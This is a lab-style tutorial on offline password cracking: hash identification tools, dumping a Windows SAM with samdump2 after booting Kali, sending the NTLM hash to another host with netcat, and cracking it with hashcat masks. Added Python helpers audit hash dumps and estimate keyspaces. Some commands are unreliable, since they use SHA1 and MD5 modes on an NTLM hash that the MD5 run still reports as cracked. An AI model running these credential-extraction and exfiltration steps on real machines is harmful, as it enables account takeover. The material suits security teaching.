Offline Password Cracking

Advantages

- Working offline does not trigger account-lockout mechanisms

- It does not generate large numbers of failed-login log entries that would draw an administrator's attention

Hash identification tools

- hash-identifier

- hashid

- Both may misidentify a hash, or fail to identify it at all

Use a tool such as hashid or Hash-Identifier to identify the hash type.

Tool download:

git clone https://github.com/psypanda/hashid.git

git clone https://github.com/Miserlou/Hash-Identifier.git

```
root@k:~/Hash-Identifier# ls
Hash_ID.py  README.md
root@k:~/Hash-Identifier# chmod u+x Hash_ID.py   // grant execute permission
root@k:~/Hash-Identifier# python Hash_ID.py      // launch Hash-Identifier
-------------------------------------------------------------------------
HASH: 5f4dcc3b5aa765d61d8327deb882cf99      // an MD5 hash

Possible Hashs:
[+]  MD5
[+]  Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

Least Possible Hashs:
[+]  RAdmin v2.x
[+]  NTLM
[+]  MD4
[+]  MD2
[+]  MD5(HMAC)
[+]  MD4(HMAC)
[+]  MD2(HMAC)
[+]  MD5(HMAC(Wordpress))
[+]  Haval-128
[+]  Haval-128(HMAC)
[+]  RipeMD-128
[+]  RipeMD-128(HMAC)
[+]  SNEFRU-128
[+]  SNEFRU-128(HMAC)
[+]  Tiger-128
[+]  Tiger-128(HMAC)
[+]  md5($pass.$salt)
[+]  md5($salt.$pass)
[+]  md5($salt.$pass.$salt)
[+]  md5($salt.$pass.$username)
[+]  md5($salt.md5($pass))
[+]  md5($salt.md5($pass))
[+]  md5($salt.md5($pass.$salt))
[+]  md5($salt.md5($pass.$salt))
[+]  md5($salt.md5($salt.$pass))
[+]  md5($salt.md5(md5($pass).$salt))
[+]  md5($username.0.$pass)
[+]  md5($username.LF.$pass)
[+]  md5($username.md5($pass).$salt)
[+]  md5(md5($pass))
[+]  md5(md5($pass).$salt)
[+]  md5(md5($pass).md5($salt))
[+]  md5(md5($salt).$pass)
[+]  md5(md5($salt).md5($pass))
[+]  md5(md5($username.$pass).$salt)
[+]  md5(md5(md5($pass)))
[+]  md5(md5(md5(md5($pass))))
[+]  md5(md5(md5(md5(md5($pass)))))
[+]  md5(sha1($pass))
[+]  md5(sha1(md5($pass)))
[+]  md5(sha1(md5(sha1($pass))))
[+]  md5(strtoupper(md5($pass)))
-------------------------------------------------------------------------
HASH: 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8    // a SHA-1 hash

Possible Hashs:
[+]  SHA-1
[+]  MySQL5 - SHA-1(SHA-1($pass))

Least Possible Hashs:
[+]  Tiger-160
[+]  Haval-160
[+]  RipeMD-160
[+]  SHA-1(HMAC)
[+]  Tiger-160(HMAC)
[+]  RipeMD-160(HMAC)
[+]  Haval-160(HMAC)
[+]  SHA-1(MaNGOS)
[+]  SHA-1(MaNGOS2)
[+]  sha1($pass.$salt)
[+]  sha1($salt.$pass)
[+]  sha1($salt.md5($pass))
[+]  sha1($salt.md5($pass).$salt)
[+]  sha1($salt.sha1($pass))
[+]  sha1($salt.sha1($salt.sha1($pass)))
[+]  sha1($username.$pass)
[+]  sha1($username.$pass.$salt)
[+]  sha1(md5($pass))
[+]  sha1(md5($pass).$salt)
[+]  sha1(md5(sha1($pass)))
[+]  sha1(sha1($pass))
[+]  sha1(sha1($pass).$salt)
[+]  sha1(sha1($pass).substr($pass,0,3))
[+]  sha1(sha1($salt.$pass))
[+]  sha1(sha1(sha1($pass)))
[+]  sha1(strtolower($username).$pass)
-------------------------------------------------------------------------
```

```
root@K:~# hashid b109f3bbbc244eb82441917ed06d618b9008dd09b3befd1b5e07394c706a8bb980b1d7785e5976ec049b46df5f1326af5a2ea6d103fd07c95385ffab0cacbc86
[+] SHA-512
[+] Whirlpool
[+] Salsa10
[+] Salsa20
[+] SHA3-512
[+] Skein-512
[+] Skein-1024(512)

root@k:~/hashid# hashid 5f4dcc3b5aa765d61d8327deb882cf99
Analyzing '5f4dcc3b5aa765d61d8327deb882cf99'
[+] MD2
[+] MD5
[+] MD4
[+] Double MD5
[+] LM
[+] RIPEMD-128
[+] Haval-128
[+] Tiger-128
[+] Skein-256(128)
[+] Skein-512(128)
[+] Lotus Notes/Domino 5
[+] Skype
[+] Snefru-128
[+] NTLM
[+] Domain Cached Credentials
[+] Domain Cached Credentials 2
[+] DNSSEC(NSEC3)
[+] RAdmin v2.x
```
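The two sessions above show why the notes warn that identification may be wrong: hashid and Hash-Identifier only look at the shape of the string, and every 128-bit digest (MD5, MD4, NTLM, LM, ...) is 32 hex characters. The following added example (not code from the notes or from either tool) reimplements that length-based triage for a small hand-picked table of algorithms and then shows the only way to settle the ambiguity: recomputing the candidate digests over a value whose plaintext you already know, such as a test account you created yourself. The candidate tables are an assumed subset, far smaller than hashid's database, and MD4/NTLM are deliberately not recomputed because `hashlib` cannot be relied on to provide MD4 under OpenSSL 3.

```python
import hashlib
import re
from typing import List, Optional

# Candidate algorithms by raw hex-digest length (a deliberately small subset of
# what hashid knows). Only the *shape* of the string is examined, which is why
# MD5, MD4, NTLM and LM are all listed for any 32-character hex string.
BY_HEX_LENGTH = {
    32: ["MD5", "MD4", "NTLM", "LM", "RIPEMD-128", "Haval-128", "Tiger-128"],
    40: ["SHA-1", "RIPEMD-160", "Tiger-160", "Haval-160", "MySQL5 (sha1(sha1($pass)))"],
    64: ["SHA-256", "SHA3-256", "GOST R 34.11-94"],
    128: ["SHA-512", "SHA3-512", "Whirlpool", "Skein-512"],
}

# Modular-crypt style prefixes are self-describing, so they are not ambiguous.
CRYPT_PREFIXES = {
    "$1$": "md5crypt",
    "$apr1$": "md5apr1 (Apache)",
    "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
    "$5$": "sha256crypt",
    "$6$": "sha512crypt",
}

HEX_RE = re.compile(r"^[0-9a-fA-F]+$")


def classify(h: str) -> List[str]:
    """Return candidate algorithm names for a hash string, hashid-style.
    An empty list means the shape is not recognised at all."""
    h = h.strip()
    for prefix, name in CRYPT_PREFIXES.items():
        if h.startswith(prefix):
            return [name]
    if HEX_RE.match(h):
        return list(BY_HEX_LENGTH.get(len(h), []))
    return []


# Constructors for the unkeyed, unsalted candidates we can recompute directly.
CHECKABLE = {
    "MD5": hashlib.md5,
    "SHA-1": hashlib.sha1,
    "SHA-256": hashlib.sha256,
    "SHA-512": hashlib.sha512,
    "SHA3-256": hashlib.sha3_256,
    "SHA3-512": hashlib.sha3_512,
}


def confirm(h: str, known_plaintext: str) -> Optional[str]:
    """Resolve the ambiguity with a value whose plaintext is already known:
    recompute every checkable candidate and return the one that matches,
    or None if none of them does (salted or keyed scheme, or wrong plaintext)."""
    target = h.strip().lower()
    for name in classify(h):
        ctor = CHECKABLE.get(name)
        if ctor and ctor(known_plaintext.encode()).hexdigest() == target:
            return name
    return None


if __name__ == "__main__":
    # The two digests fed to Hash-Identifier above; both are digests of "password".
    for digest in ("5f4dcc3b5aa765d61d8327deb882cf99",
                   "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"):
        print(digest)
        print("  candidates:", classify(digest))
        print("  confirmed :", confirm(digest, "password"))
```

`classify` narrows but never decides; `confirm` decides only when the scheme is unsalted and the plaintext is known, which is exactly the situation a defender is in when checking what an application really stores.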

Offline Password Cracking

Windows hash extraction tools

- Via exploitation: Pwdump, fgdump, mimikatz, wce

- Via physical access: samdump2

- Boot the virtual machine from a Kali ISO

- mount /dev/sda1 /mnt

- cd /mnt/Windows/System32/config

- samdump2 SYSTEM SAM -o sam.hash

- Transfer the hash with nc

Windows 7 IP address: 192.168.1.121

```
C:\>net user w7 1234
命令完成成功!
```

```
root@kali:~# fdisk -l    // list partitions
Disk /dev/sda: 80 GiB, 85899345920 bytes, 16772160 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x6852cbef

Device     Boot  Start       End   Sectors  Size ID Type
/dev/sda1  *      2048    206847    204800  100M  7 HPFS/NTFS/exFAT
/dev/sda2       206848  16770111 167563264 79.9G  7 HPFS/NTFS/exFAT

Disk /dev/loop0: 2.4GB, 2556620800 bytes, 4993400 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes

root@kali:~# mount /dev/sda2 /mnt/
root@kali:~# mount /dev/sda2 /media/
root@kali:~# cd /media/
root@kali:/media# ls
Boot  bootmgr  BOOTSECT.BAK  grldr  $RECYCLE.BIN  System Volume Information
root@kali:/media# cd /mnt/
root@kali:/mnt# ls
Documents and Settings
pagefile.sys
PerfLogs
root@kali:/mnt# cd /mnt/Windows/System32/config
root@kali:/mnt/Windows/System32/config# ls
root@kali:/mnt/Windows/System32/config# samdump2 SYSTEM SAM -o sam.hash
root@kali:/mnt/Windows/System32/config# cat sam.hash
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
w7:1000:aad3b435b51404eeaad3b435b51404ee:7ce21f17c0aee7fb9ceba532d0546ad6:::
```

```
root@K:~# nc -nvlp 333
listening on [any] 333 ...
connect to [192.168.1.117] from (UNKNOWN) [192.168.1.121] 56580
7ce21f17c0aee7fb9ceba532d0546ad6
```

Listen with nc on the receiving box and send the hash to it:

```
root@kali:/mnt/Windows/System32/config# nc 192.168.1.117 333
7ce21f17c0aee7fb9ceba532d0546ad6
```
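The `sam.hash` output above is in pwdump format, `[*disabled*] user:RID:LM-hash:NT-hash:::`. Two constant values in it carry meaning a reviewer of such a dump should recognise: `aad3b435b51404eeaad3b435b51404ee` in the LM field means no LM hash is stored (the default since Vista), and `31d6cfe0d16ae931b73c59d7e0c089c0` in the NT field is the NT hash of the empty password. The following added example (not part of the notes or of samdump2) parses that format and runs the checks a defender wants from such a dump: enabled accounts with a blank password, accounts that still store a legacy LM hash, and NT hashes shared by several accounts (password reuse). The three sample lines are the ones samdump2 printed above; the extra lines are constructed purely to exercise each finding.

```python
from dataclasses import dataclass
from typing import Dict, List

# Well-known constants: the LM and NT hashes of an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"


@dataclass
class SamEntry:
    username: str
    rid: int
    lm_hash: str
    nt_hash: str
    disabled: bool


def parse_pwdump_line(line: str) -> SamEntry:
    """Parse one pwdump-format line: [*disabled*] user:rid:lmhash:nthash:::"""
    line = line.strip()
    disabled = line.startswith("*disabled*")
    if disabled:
        line = line[len("*disabled*"):].strip()
    fields = line.split(":")
    if len(fields) < 4:
        raise ValueError(f"not a pwdump line: {line!r}")
    return SamEntry(fields[0], int(fields[1]), fields[2].lower(), fields[3].lower(), disabled)


def load(text: str) -> List[SamEntry]:
    return [parse_pwdump_line(l) for l in text.splitlines() if l.strip()]


def audit(entries: List[SamEntry]) -> Dict[str, object]:
    """Findings: enabled accounts with a blank password, accounts still holding
    an LM hash, and NT hashes reused by more than one account."""
    blank = [e.username for e in entries if not e.disabled and e.nt_hash == EMPTY_NT]
    lm_present = [e.username for e in entries if e.lm_hash != EMPTY_LM]
    by_nt: Dict[str, List[str]] = {}
    for e in entries:
        if e.nt_hash != EMPTY_NT:
            by_nt.setdefault(e.nt_hash, []).append(e.username)
    reused = {h: users for h, users in by_nt.items() if len(users) > 1}
    return {"blank_password": blank, "lm_hash_present": lm_present, "reused_nt": reused}


# The three lines samdump2 produced in the walkthrough above.
SAMPLE = """
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
w7:1000:aad3b435b51404eeaad3b435b51404ee:7ce21f17c0aee7fb9ceba532d0546ad6:::
"""

# Constructed lines (not from the notes) that trigger each finding: "backup"
# reuses w7's NT hash, "legacy" stores an LM hash (dummy value), "tmp" is an
# enabled account with a blank password.
CONSTRUCTED_EXTRA = """
backup:1001:aad3b435b51404eeaad3b435b51404ee:7ce21f17c0aee7fb9ceba532d0546ad6:::
legacy:1002:00112233445566778899aabbccddeeff:ffeeddccbbaa99887766554433221100:::
tmp:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""

if __name__ == "__main__":
    print("notes only     :", audit(load(SAMPLE)))
    print("with constructed:", audit(load(SAMPLE + CONSTRUCTED_EXTRA)))
```

On the notes' own dump every finding is empty: both blank-password accounts are disabled, no LM hashes are stored, and the one active account's NT hash is unique. That NT hash is what hashcat's mode 1000 (NTLM, per the hash-type table further down) expects as input.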

Offline Password Cracking: Hashcat

Open-source, multithreaded password recovery tool

Supports cracking more than 80 hash algorithms

Cracks using CPU computing power

Six attack modes

- 0 Straight: dictionary attack

- 1 Combination: combine words from the dictionary with each other (1 2 > 11 22 12 21)

- 2 Toggle case: try every upper/lower-case combination of each dictionary word

- 3 Brute force: every combination of a specified character set (or of all character sets)

- 4 Permutation: every permutation of the characters of each dictionary word (12 21)

- 5 Table-lookup: the program automatically generates masks for every word in the dictionary

GPU cracking powerhouse: an introduction to Hashcat

ccSec · 2013/09/30 20:13

0x00 Background

GPUs keep getting faster, and using their enormous computing throughput for brute-force password cracking has greatly improved success rates; I once saw someone abroad build a distributed cracking rig out of 26 graphics cards and was deeply envious. When it comes to the best GPU hash-cracking software today, nothing beats HashCat. Below I introduce the HashCat family of tools in detail.

0x01 Required hardware and platforms

The HashCat family supports cracking on CPUs, NVIDIA GPUs and ATI GPUs. It runs on Windows and Linux, and requires the officially specified version of the graphics driver; with the wrong driver version the program may fail to run.

If you want to build a multi-GPU cracking platform, it is best to run the HashCat tools on Linux, because Windows recognises at most four graphics cards. In addition, VirtualCL on Linux (for setting up a VirtualCL environment see the official documentation at http://hashcat.net/wiki/doku.php?id=vcl_cluster_howto) makes it easy to link several machines together for distributed cracking jobs. In terms of speed, ATI GPUs are the fastest: a single HD7970 reaches about 9000M/s on MD5. NVIDIA cards come next, with a GTX690 of the same class at roughly one third of the ATI card's speed, and CPU cracking is the slowest.

0x02 The HashCat software

HashCat comes in three main versions: Hashcat, oclHashcat-plus and oclHashcat-lite. The main differences are: HashCat only supports CPU cracking. oclHashcat-plus supports cracking multiple hashes on the GPU and supports as many as 77 algorithms. oclHashcat-lite only supports cracking a single hash on the GPU and supports just 32 hash types, but its algorithms are optimised to reach the maximum GPU cracking speed. If you only have a single hash to crack, oclHashCat-lite is recommended.

The latest versions at the time of writing are HashCat v0.46, oclHashcat-plus v0.15 and oclHashcat-lite v0.15. After some testing, however, I found that a newer version is sometimes slower. So as long as the version you have works, there is no need to upgrade to the latest one. In my tests oclHashcat-lite v0.10 ran about 20% faster than v0.15, so for single-hash cracking oclHashcat-lite v0.10 is still recommended.

```
root@k:~# hashcat -h
hashcat, advanced password recovery

Usage: hashcat [options] hashfile [mask|wordfiles|directories]

=======
Options
=======

* General:

  -m,  --hash-type=NUM               Hash-type, see references below
  -a,  --attack-mode=NUM             Attack-mode, see references below
  -V,  --version                     Print version
  -h,  --help                        Print help
       --quiet                       Suppress output

* Benchmark:

  -b,  --benchmark                   Run benchmark

* Misc:

       --hex-salt                    Assume salt is given in hex
       --hex-charset                 Assume charset is given in hex
       --runtime=NUM                 Abort session after NUM seconds of runtime
       --status                      Enable automatic update of the status-screen
       --status-timer=NUM            Seconds between status-screen update
       --status-automat              Display the status view in a machine readable format

* Files:

  -o,  --outfile=FILE                Define outfile for recovered hash
       --outfile-format=NUM          Define outfile-format for recovered hash, see references below
       --outfile-autohex-disable     Disable the use of $HEX[] in output plains
  -p,  --separator=CHAR              Define separator char for hashlists/outfile
       --show                        Show cracked passwords only (see --username)
       --left                        Show uncracked passwords only (see --username)
       --username                    Enable ignoring of usernames in hashfile (Recommended: also use --show)
       --remove                      Enable remove of hash once it is cracked
       --stdout                      Stdout mode
       --potfile-disable             Do not write potfile
       --debug-mode=NUM              Defines the debug mode (hybrid only by using rules), see references below
       --debug-file=FILE             Output file for debugging rules (see --debug-mode)
  -e,  --salt-file=FILE              Salts-file for unsalted hashlists

* Resources:

  -c,  --segment-size=NUM            Size in MB to cache from the wordfile
  -n,  --threads=NUM                 Number of threads
  -s,  --words-skip=NUM              Skip number of words (for resume)
  -l,  --words-limit=NUM             Limit number of words (for distributed)

* Rules:

  -r,  --rules-file=FILE             Rules-file use: -r 1.rule
  -g,  --generate-rules=NUM          Generate NUM random rules
       --generate-rules-func-min=NUM Force NUM functions per random rule min
       --generate-rules-func-max=NUM Force NUM functions per random rule max
       --generate-rules-seed=NUM     Force RNG seed to NUM

* Custom charsets:

  -1,  --custom-charset1=CS          User-defined charsets
  -2,  --custom-charset2=CS          Example:
  -3,  --custom-charset3=CS          --custom-charset1=?dabcdef : sets charset ?1 to 0123456789abcdef
  -4,  --custom-charset4=CS          -2 mycharset.hcchr : sets charset ?2 to chars contained in file

* Toggle-Case attack-mode specific:

       --toggle-min=NUM              Number of alphas in dictionary minimum
       --toggle-max=NUM              Number of alphas in dictionary maximum

* Mask-attack attack-mode specific:

       --increment                   Enable increment mode
       --increment-min=NUM           Start incrementing at NUM
       --increment-max=NUM           Stop incrementing at NUM

* Permutation attack-mode specific:

       --perm-min=NUM                Filter words shorter than NUM
       --perm-max=NUM                Filter words larger than NUM

* Table-Lookup attack-mode specific:

  -t,  --table-file=FILE             Table file
       --table-min=NUM               Number of chars in dictionary minimum
       --table-max=NUM               Number of chars in dictionary maximum

* Prince attack-mode specific:

       --pw-min=NUM                  Print candidate if length is greater than NUM
       --pw-max=NUM                  Print candidate if length is smaller than NUM
       --elem-cnt-min=NUM            Minimum number of elements per chain
       --elem-cnt-max=NUM            Maximum number of elements per chain
       --wl-dist-len                 Calculate output length distribution from wordlist
       --wl-max=NUM                  Load only NUM words from input wordlist or use 0 to disable
       --case-permute                For each word in the wordlist that begins with a letter
                                     generate a word with the opposite case of the first letter

==========
References
==========

* Outfile formats:

    1 = hash[:salt]
    2 = plain
    3 = hash[:salt]:plain
    4 = hex_plain
    5 = hash[:salt]:hex_plain
    6 = plain:hex_plain
    7 = hash[:salt]:plain:hex_plain
    8 = crackpos
    9 = hash[:salt]:crackpos
   10 = plain:crackpos
   11 = hash[:salt]:plain:crackpos
   12 = hex_plain:crackpos
   13 = hash[:salt]:hex_plain:crackpos
   14 = plain:hex_plain:crackpos
   15 = hash[:salt]:plain:hex_plain:crackpos

* Debug mode output formats (for hybrid mode only, by using rules):

    1 = save finding rule
    2 = save original word
    3 = save original word and finding rule
    4 = save original word, finding rule and modified plain

* Built-in charsets:

   ?l = abcdefghijklmnopqrstuvwxyz
   ?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
   ?d = 0123456789
   ?s =  !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
   ?a = ?l?u?d?s
   ?b = 0x00 - 0xff

* Attack modes:

    0 = Straight
    1 = Combination
    2 = Toggle-Case
    3 = Brute-force
    4 = Permutation
    5 = Table-Lookup
    8 = Prince

* Hash types:

      0 = MD5
     10 = md5($pass.$salt)
     20 = md5($salt.$pass)
     30 = md5(unicode($pass).$salt)
     40 = md5($salt.unicode($pass))
     50 = HMAC-MD5 (key = $pass)
     60 = HMAC-MD5 (key = $salt)
    100 = SHA1
    110 = sha1($pass.$salt)
    120 = sha1($salt.$pass)
    130 = sha1(unicode($pass).$salt)
    140 = sha1($salt.unicode($pass))
    150 = HMAC-SHA1 (key = $pass)
    160 = HMAC-SHA1 (key = $salt)
    200 = MySQL323
    300 = MySQL4.1/MySQL5
    400 = phpass, MD5(Wordpress), MD5(phpBB3), MD5(Joomla)
    500 = md5crypt, MD5(Unix), FreeBSD MD5, Cisco-IOS MD5
    900 = MD4
   1000 = NTLM
   1100 = Domain Cached Credentials (DCC), MS Cache
   1400 = SHA256
   1410 = sha256($pass.$salt)
   1420 = sha256($salt.$pass)
   1430 = sha256(unicode($pass).$salt)
   1431 = base64(sha256(unicode($pass)))
   1440 = sha256($salt.unicode($pass))
   1450 = HMAC-SHA256 (key = $pass)
   1460 = HMAC-SHA256 (key = $salt)
   1600 = md5apr1, MD5(APR), Apache MD5
   1700 = SHA512
   1710 = sha512($pass.$salt)
   1720 = sha512($salt.$pass)
   1730 = sha512(unicode($pass).$salt)
   1740 = sha512($salt.unicode($pass))
   1750 = HMAC-SHA512 (key = $pass)
   1760 = HMAC-SHA512 (key = $salt)
   1800 = SHA-512(Unix)
   2400 = Cisco-PIX MD5
   2410 = Cisco-ASA MD5
   2500 = WPA/WPA2
   2600 = Double MD5
   3200 = bcrypt, Blowfish(OpenBSD)
   3300 = MD5(Sun)
   3500 = md5(md5(md5($pass)))
   3610 = md5(md5($salt).$pass)
   3710 = md5($salt.md5($pass))
   3720 = md5($pass.md5($salt))
   3800 = md5($salt.$pass.$salt)
   3910 = md5(md5($pass).md5($salt))
   4010 = md5($salt.md5($salt.$pass))
   4110 = md5($salt.md5($pass.$salt))
   4210 = md5($username.0.$pass)
   4300 = md5(strtoupper(md5($pass)))
   4400 = md5(sha1($pass))
   4500 = Double SHA1
   4600 = sha1(sha1(sha1($pass)))
   4700 = sha1(md5($pass))
   4800 = MD5(Chap), iSCSI CHAP authentication
   4900 = sha1($salt.$pass.$salt)
   5000 = SHA-3(Keccak)
   5100 = Half MD5
   5200 = Password Safe SHA-256
   5300 = IKE-PSK MD5
   5400 = IKE-PSK SHA1
   5500 = NetNTLMv1-VANILLA / NetNTLMv1-ESS
   5600 = NetNTLMv2
   5700 = Cisco-IOS SHA256
   5800 = Android PIN
   6300 = AIX {smd5}
   6400 = AIX {ssha256}
   6500 = AIX {ssha512}
   6700 = AIX {ssha1}
   6900 = GOST, GOST R 34.11-94
   7000 = Fortigate (FortiOS)
   7100 = OS X v10.8+
   7200 = GRUB 2
   7300 = IPMI2 RAKP HMAC-SHA1
   7400 = sha256crypt, SHA256(Unix)
   7900 = Drupal7
   8400 = WBB3, Woltlab Burning Board 3
   8900 = scrypt
   9200 = Cisco $8$
   9300 = Cisco $9$
   9800 = Radmin2
  10000 = Django (PBKDF2-SHA256)
  10200 = Cram MD5
  10300 = SAP CODVN H (PWDSALTEDHASH) iSSHA-1
  11000 = PrestaShop
  11100 = PostgreSQL Challenge-Response Authentication (MD5)
  11200 = MySQL Challenge-Response Authentication (SHA1)
  11400 = SIP digest authentication (MD5)
  99999 = Plaintext

* Specific hash types:

     11 = Joomla < 2.5.18
     12 = PostgreSQL
     21 = osCommerce, xt:Commerce
     23 = Skype
    101 = nsldap, SHA-1(Base64), Netscape LDAP SHA
    111 = nsldaps, SSHA-1(Base64), Netscape LDAP SSHA
    112 = Oracle S: Type (Oracle 11+)
    121 = SMF > v1.1
    122 = OS X v10.4, v10.5, v10.6
    123 = EPi
    124 = Django (SHA-1)
    131 = MSSQL(2000)
    132 = MSSQL(2005)
    133 = PeopleSoft
    141 = EPiServer 6.x < v4
   1421 = hMailServer
   1441 = EPiServer 6.x > v4
   1711 = SSHA-512(Base64), LDAP {SSHA512}
   1722 = OS X v10.7
   1731 = MSSQL(2012 & 2014)
   2611 = vBulletin < v3.8.5
   2612 = PHPS
   2711 = vBulletin > v3.8.5
   2811 = IPB2+, MyBB1.2+
   3711 = Mediawiki B type
   3721 = WebEdition CMS
   7600 = Redmine Project Management Web App
```

```
root@k:~# echo 7ce21f17c0aee7fb9ceba532d0546ad6 > sam.hash
root@k:~# hashcat -m 100 sam.hash pass.lst
```

Offline Password Cracking: Hashcat

Commands

- hashcat -b

- hashcat -m 100 hash.dump pass.lst

- hashcat -m 0 hash.txt -a 3 ?l?l?l?l?l?l?l?l?d?d

- Results are written to: hashcat.pot

- hashcat -m 100 -a 3 sam.hash -i --increment-min 6 --increment-max 8 ?l?l?l?l?l?l?l?l

- ?l = abcdefghijklmnopqrstuvwxyz

- ?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ

- ?d = 0123456789

- ?s = !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~

- ?a = ?l?u?d?s

- ?b = 0x00 - 0xff
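The six attack modes listed earlier and the mask charsets above define how many candidates a run has to try, and that number, divided by the rate `hashcat -b` reports, is the worst-case time an attacker needs, which is the number a defender uses to judge a password policy. The following added example (not code from the notes or from hashcat) computes the keyspace of a mask, of an incremental mask run (`-i --increment-min/--increment-max`), and an upper bound for the wordlist-based modes 0, 1, 2 and 4, and turns it into a time estimate. Charset sizes are those listed above (`?a` = 26 + 26 + 10 + 33 = 95); the user-defined charsets `?1`..`?4` are passed in as their sizes, which is an assumption of this example rather than hashcat's syntax.

```python
import math
from typing import Dict, List, Optional

# Sizes of hashcat's built-in charsets as listed above; ?a = ?l + ?u + ?d + ?s.
BUILTIN_CHARSETS = {"l": 26, "u": 26, "d": 10, "s": 33, "a": 95, "b": 256}


def parse_mask(mask: str, custom: Optional[Dict[str, int]] = None) -> List[int]:
    """Turn a hashcat mask into per-position charset sizes.
    ?l ?u ?d ?s ?a ?b are built in, ?1..?4 come from `custom` (size of the
    user-defined charset), ?? is a literal '?', any other character is a literal."""
    custom = custom or {}
    sizes: List[int] = []
    i = 0
    while i < len(mask):
        if mask[i] != "?":
            sizes.append(1)            # literal character, one choice
            i += 1
            continue
        if i + 1 >= len(mask):
            raise ValueError("dangling '?' at end of mask")
        key = mask[i + 1]
        if key == "?":
            sizes.append(1)
        elif key in BUILTIN_CHARSETS:
            sizes.append(BUILTIN_CHARSETS[key])
        elif key in custom:
            sizes.append(custom[key])
        else:
            raise ValueError(f"unknown charset ?{key}")
        i += 2
    return sizes


def mask_keyspace(mask: str, custom: Optional[Dict[str, int]] = None) -> int:
    """Candidates enumerated by a plain mask attack (-a 3)."""
    return math.prod(parse_mask(mask, custom))


def increment_keyspace(mask: str, min_len: int, max_len: int,
                       custom: Optional[Dict[str, int]] = None) -> int:
    """Candidates for -a 3 -i: the mask is truncated to every length from
    min_len to max_len, capped at the mask's own length (a one-position mask
    with --increment-max 5 still stops after length 1, as in the run below)."""
    sizes = parse_mask(mask, custom)
    max_len = min(max_len, len(sizes))
    return sum(math.prod(sizes[:n]) for n in range(min_len, max_len + 1))


def mode_keyspace(mode: int, words: List[str]) -> int:
    """Upper bound on candidates for the wordlist-based modes, using the same
    wordlist on every side."""
    if mode == 0:   # Straight: one candidate per word
        return len(words)
    if mode == 1:   # Combination: every word joined with every word (11 22 12 21)
        return len(words) ** 2
    if mode == 2:   # Toggle-case: each letter may be upper or lower case
        return sum(2 ** sum(ch.isalpha() for ch in w) for w in words)
    if mode == 4:   # Permutation: len! orderings per word (fewer if chars repeat)
        return sum(math.factorial(len(w)) for w in words)
    raise ValueError(f"mode {mode} is not wordlist-based or not modelled here")


def seconds_to_exhaust(keyspace: int, speed_per_sec: float) -> float:
    """Worst-case time to try every candidate at a given hash rate."""
    return keyspace / speed_per_sec


if __name__ == "__main__":
    ntlm_cpu_speed = 14.27e6   # NTLM rate reported by the hashcat -b run below
    for mask in ("?d?d?d?d", "?l?l?l?l?l?l?l?l?d?d", "?a?a?a?a?a?a"):
        ks = mask_keyspace(mask)
        hours = seconds_to_exhaust(ks, ntlm_cpu_speed) / 3600
        print(f"{mask:24s} {ks:>20,d} candidates {hours:12.1f} h at {ntlm_cpu_speed:.2e}/s")
    print("?a, lengths 4..6 incremental:", f"{increment_keyspace('?a?a?a?a?a?a', 4, 6):,d}")
```

The numbers line up with the runs that follow: `?d?d?d?d` is 10,000 candidates (the run below reports `9324/10000` when it stops), and the first step of the `?a` increment run is 95^4 = 81,450,625, the total the status screen shows for mask length 4.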

```
root@k:~# hashcat -b
Initializing hashcat v2.00 with 1 threads and 32mb segment-size...

Device...........: Intel(R) Core(TM) i5-4460  CPU @ 3.20GHz
Instruction set..: x86_64
Number of threads: 1

Hash type: MD4
Speed/sec: 15.88M words

Hash type: MD5
Speed/sec: 12.96M words

Hash type: SHA1
Speed/sec: 9.28M words

Hash type: SHA256
Speed/sec: 4.65M words

Hash type: SHA512
Speed/sec: 1.94M words

Hash type: SHA-3(Keccak)
Speed/sec: 2.15M words

Hash type: GOST R 34.11-94
Speed/sec: 946.71k words

Hash type: SHA-1(Base64), nsldap, Netscape LDAP SHA
Speed/sec: 8.58M words

Hash type: SSHA-1(Base64), nsldaps, Netscape LDAP SSHA
Speed/sec: 8.21M words

Hash type: md5crypt, MD5(Unix), FreeBSD MD5, Cisco-IOS MD5
Speed/sec: 13.21k words

Hash type: sha256crypt, SHA256(Unix)
Speed/sec: 602 words

Hash type: sha512crypt, SHA512(Unix)
Speed/sec: 382 words

Hash type: bcrypt, Blowfish(OpenBSD)
Speed/sec: 818 words

Hash type: NTLM
Speed/sec: 14.27M words

Hash type: Domain Cached Credentials (DCC), MS Cache
Speed/sec: 8.25M words

Hash type: NetNTLMv1-VANILLA / NetNTLMv1+ESS
Speed/sec: 13.82M words

Hash type: NetNTLMv2
Speed/sec: 2.09M words
```

```
root@k:~# hashcat -m 0 hash.txt -a 3 ?d?d?d?d
Initializing hashcat v2.00 with 1 threads and 32mb segment-size...

Added hash from file sam.hash: 1 (1 salts)
Activating quick-digest mode for single hash

7ce21f17c0aee7fb9ceba532d0546ad6:1234

All hashes have been recovered

Input.Mode: Mask (?d?d?d?d) [4]
Index.....: 0/1 (segment), 1000 (words), 0 (bytes)
Recovered.: 1/1 hashes, 1/1 salts
Speed/sec.: - plains, 9.31k words
Progress..: 9324/10000 (93.24%)
Running...: 00:00:00:01
Estimated.: --:--:--:--

Started Fri Apr 22 00:31:47 2016
Stopped Fri Apr 22 00:31:47 2016
```

```
